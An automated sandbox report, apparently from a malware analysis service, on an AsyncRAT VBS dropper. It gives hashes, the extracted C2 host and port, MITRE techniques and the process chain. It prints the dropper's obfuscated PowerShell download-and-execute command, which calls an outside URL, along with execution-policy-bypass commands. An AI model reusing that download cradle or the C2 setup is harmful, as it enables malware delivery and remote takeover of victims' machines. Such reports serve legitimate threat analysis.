asyncrat | 2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
19-10-2024 07:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WWjjNTGdMh.vbs
Size

12KB
MD5

75f80ac848e2c5c71c5fc4960da7a430
SHA1

abcd9316f8a1251220db81d4d075ae659a0fb790
SHA256

2a08ea90518aa5b6f42d1ffa9632584fabe46dacc993732ac9776a71b9ac8acd
SHA512

af4db86a398ac31f3b7d909ed62c8ea6b3672db933deadf32ae74e3dac581816372bfb0fc113f5b1aab462291d560516cadd52c655eebd79b7f639467c2c0ce1
SSDEEP

48:UvvvvvvvvvvviddddddddddFP5+31HtwLhLtz/zzUSAzzzzzzzzzzzzzzzzzzzze:UvvvvvvvvvvviddddddddddZagKoJ

Score

10^/10

asyncrat kk_______discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

| Edit 3LOSH RAT

Botnet

kk_______

helpher.linkpc.net:6666

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 2688 powershell.exe

flow	pid	process
5	2688	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2688 powershell.exe
3600 powershell.exe
3860 powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3860 set thread context of 3696 3860 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

aspnet_compiler.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings powershell.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2688 powershell.exe
2688 powershell.exe
3600 powershell.exe
3600 powershell.exe
3860 powershell.exe
3860 powershell.exe

pid	process
2688	powershell.exe
3600	powershell.exe
3860	powershell.exe

description	pid	process	target process
PID 3860 set thread context of 3696	3860	powershell.exe	aspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	powershell.exe

pid	process
2688	powershell.exe
2688	powershell.exe
3600	powershell.exe
3600	powershell.exe
3860	powershell.exe
3860	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeIncreaseQuotaPrivilege	3600	powershell.exe
Token: SeSecurityPrivilege	3600	powershell.exe
Token: SeTakeOwnershipPrivilege	3600	powershell.exe
Token: SeLoadDriverPrivilege	3600	powershell.exe
Token: SeSystemProfilePrivilege	3600	powershell.exe
Token: SeSystemtimePrivilege	3600	powershell.exe
Token: SeProfSingleProcessPrivilege	3600	powershell.exe
Token: SeIncBasePriorityPrivilege	3600	powershell.exe
Token: SeCreatePagefilePrivilege	3600	powershell.exe
Token: SeBackupPrivilege	3600	powershell.exe
Token: SeRestorePrivilege	3600	powershell.exe
Token: SeShutdownPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeSystemEnvironmentPrivilege	3600	powershell.exe
Token: SeRemoteShutdownPrivilege	3600	powershell.exe
Token: SeUndockPrivilege	3600	powershell.exe
Token: SeManageVolumePrivilege	3600	powershell.exe
Token: 33	3600	powershell.exe
Token: 34	3600	powershell.exe
Token: 35	3600	powershell.exe
Token: 36	3600	powershell.exe
Token: SeIncreaseQuotaPrivilege	3600	powershell.exe
Token: SeSecurityPrivilege	3600	powershell.exe
Token: SeTakeOwnershipPrivilege	3600	powershell.exe
Token: SeLoadDriverPrivilege	3600	powershell.exe
Token: SeSystemProfilePrivilege	3600	powershell.exe
Token: SeSystemtimePrivilege	3600	powershell.exe
Token: SeProfSingleProcessPrivilege	3600	powershell.exe
Token: SeIncBasePriorityPrivilege	3600	powershell.exe
Token: SeCreatePagefilePrivilege	3600	powershell.exe
Token: SeBackupPrivilege	3600	powershell.exe
Token: SeRestorePrivilege	3600	powershell.exe
Token: SeShutdownPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeSystemEnvironmentPrivilege	3600	powershell.exe
Token: SeRemoteShutdownPrivilege	3600	powershell.exe
Token: SeUndockPrivilege	3600	powershell.exe
Token: SeManageVolumePrivilege	3600	powershell.exe
Token: 33	3600	powershell.exe
Token: 34	3600	powershell.exe
Token: 35	3600	powershell.exe
Token: 36	3600	powershell.exe
Token: SeIncreaseQuotaPrivilege	3600	powershell.exe
Token: SeSecurityPrivilege	3600	powershell.exe
Token: SeTakeOwnershipPrivilege	3600	powershell.exe
Token: SeLoadDriverPrivilege	3600	powershell.exe
Token: SeSystemProfilePrivilege	3600	powershell.exe
Token: SeSystemtimePrivilege	3600	powershell.exe
Token: SeProfSingleProcessPrivilege	3600	powershell.exe
Token: SeIncBasePriorityPrivilege	3600	powershell.exe
Token: SeCreatePagefilePrivilege	3600	powershell.exe
Token: SeBackupPrivilege	3600	powershell.exe
Token: SeRestorePrivilege	3600	powershell.exe
Token: SeShutdownPrivilege	3600	powershell.exe
Token: SeDebugPrivilege	3600	powershell.exe
Token: SeSystemEnvironmentPrivilege	3600	powershell.exe
Token: SeRemoteShutdownPrivilege	3600	powershell.exe
Token: SeUndockPrivilege	3600	powershell.exe
Token: SeManageVolumePrivilege	3600	powershell.exe
Token: 33	3600	powershell.exe
Token: 34	3600	powershell.exe
Token: 35	3600	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exeWScript.execmd.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 3304 wrote to memory of 2688	3304	WScript.exe	powershell.exe
PID 3304 wrote to memory of 2688	3304	WScript.exe	powershell.exe
PID 2688 wrote to memory of 4364	2688	powershell.exe	WScript.exe
PID 2688 wrote to memory of 4364	2688	powershell.exe	WScript.exe
PID 4364 wrote to memory of 2936	4364	WScript.exe	cmd.exe
PID 4364 wrote to memory of 2936	4364	WScript.exe	cmd.exe
PID 2936 wrote to memory of 3600	2936	cmd.exe	powershell.exe
PID 2936 wrote to memory of 3600	2936	cmd.exe	powershell.exe
PID 3996 wrote to memory of 1972	3996	WScript.exe	cmd.exe
PID 3996 wrote to memory of 1972	3996	WScript.exe	cmd.exe
PID 1972 wrote to memory of 3860	1972	cmd.exe	powershell.exe
PID 1972 wrote to memory of 3860	1972	cmd.exe	powershell.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe
PID 3860 wrote to memory of 3696	3860	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\WWjjNTGdMh.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command $t1='IEX(New-Object Net.W';$t2='ebClient).Downlo';$t3='t4(''https://totalhorsehealth.com/wp-admin/images/images/img.jpg'')'.Replace('t4','adString');IEX($t1+$t2+$t3)
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:2936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3600

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3860

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:3696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Unlimited\ISO\Binnot.bat

Filesize
96B

MD5
f1d747a7825a5db756d428a5254d244e

SHA1
7db56fe57492bd856c787cd2a836eff4f2ce5e01

SHA256
5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf

SHA512
4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.ps1

Filesize
781B

MD5
58ef18971b1520648e0c6d67036251ff

SHA1
68bd1ee657ff233f6a1ee453914aaecdeb845284

SHA256
226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3

SHA512
9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.vbs

Filesize
161B

MD5
7b0e58ca3cd90265cfad552b57b52726

SHA1
732d67419df7ae6ab6512e697f7cdfd72aad4f15

SHA256
f6f353790e3f1f92ac7be5bc0f03a334e199cbbd53392e9eb8079f9b8495cc6f

SHA512
9f4853237c88f2045bdacc616360f67abadfec21547a3413f0e72491e0c9d896030a3091e3bf5453f0b787c6dfcaea51c4eaa3e15a1ab982b7e3d5159172c0ba

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.bat

Filesize
99B

MD5
eff64d56c40c54a1f9891d7a6ad54899

SHA1
dbaf9a4aeb8484690d6118155d59158598f0799a

SHA256
c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2

SHA512
c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.ps1

Filesize
251KB

MD5
7e35bcb43f83d90da193a20f4022961d

SHA1
9a87c04bed313ec676b1a95a40388b039e4b7df4

SHA256
f11b826123593fc55cdb377b7f88c5f97ed6d6a031e03f5ca367d462642b516b

SHA512
762a256e07c65bc8db3714e5a170081edd006e7f2c53a3474cb13a56e74925073a1cf974930b824e74773c2a4e21d952f90dab7d7238ef607a823fdb8c1cf607

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.vbs

Filesize
165B

MD5
b1b2e3fb678ad030e95ff623fe80d979

SHA1
cf00dc8fb35e255fee951b6baf08fd44e1e5b5fc

SHA256
19a88a8c19ad3f6dde00c79954d9822f1197bb0c73a4c166470fd44de4c89f33

SHA512
15d4670d547cf6556198fffd4c2ce7a614c948d7aa1361ad80187fe5abf163c9ef61e0c5693d145dce3194bbfae5f0734b3827feee7c0418c19e88f2d87aae62

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
7442897bb1def57caf15b4c2dfb35a96

SHA1
2b78aaebf595788524fb9f783b58c6680b2f494a

SHA256
b42aaf4b1cab17873aa67111ab79244480435b0ae5e41e14b92ccb20b6bce6a7

SHA512
e9a58a0d2ef142461ae390e93d019ef9007b9620a11195c75f1f32aa7ca30dcc9e76cbe5091479d51d8ac9062132330b4cec44e1995e8cb95a91bc8704807989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
32e376683d18c3c19649830c9bd5bc89

SHA1
ac04e3e670f8262451930096d0449c627da51e20

SHA256
a2eefeee1bd2c4e4ad3a09a0878840c4ea6e5ba07bae09673f5a6ed5970ecf62

SHA512
662e95eca6f9e868070c2bd8a9fd6afc30c07420f92d2c808bbda10beebbf49e6fa5069ffcf54568463c1f70d78c508aeeb4f5fabd2ceec3f4cb468bac583a91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
967b079caeef0e00050614954d1a184d

SHA1
46ea22a59c460abafa890135aaf349028745a583

SHA256
5ac5afeeb1c746d088c914a69a1ff99b61a3d2655cc3028d9f8ad9e08706a792

SHA512
b003ad5479e3e55f5cff94a037da9f8ee70657edd4ea2b72fe9fe6f53e6cc13c99085c9bd8cd97068cc56295bba43c96fcbacbdf92fc85f9584b9f9bdffb058b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v1pam1mt.lw0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2688-12-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/2688-26-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/2688-20-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/2688-19-0x00007FFC7FDF3000-0x00007FFC7FDF5000-memory.dmp

Filesize
8KB

Download
memory/2688-0-0x00007FFC7FDF3000-0x00007FFC7FDF5000-memory.dmp

Filesize
8KB

Download
memory/2688-11-0x00007FFC7FDF0000-0x00007FFC808B1000-memory.dmp

Filesize
10.8MB

Download
memory/2688-10-0x00000224B2930000-0x00000224B2952000-memory.dmp

Filesize
136KB

Download
memory/3696-55-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3860-54-0x00000127614B0000-0x00000127614C8000-memory.dmp

Filesize
96KB

Download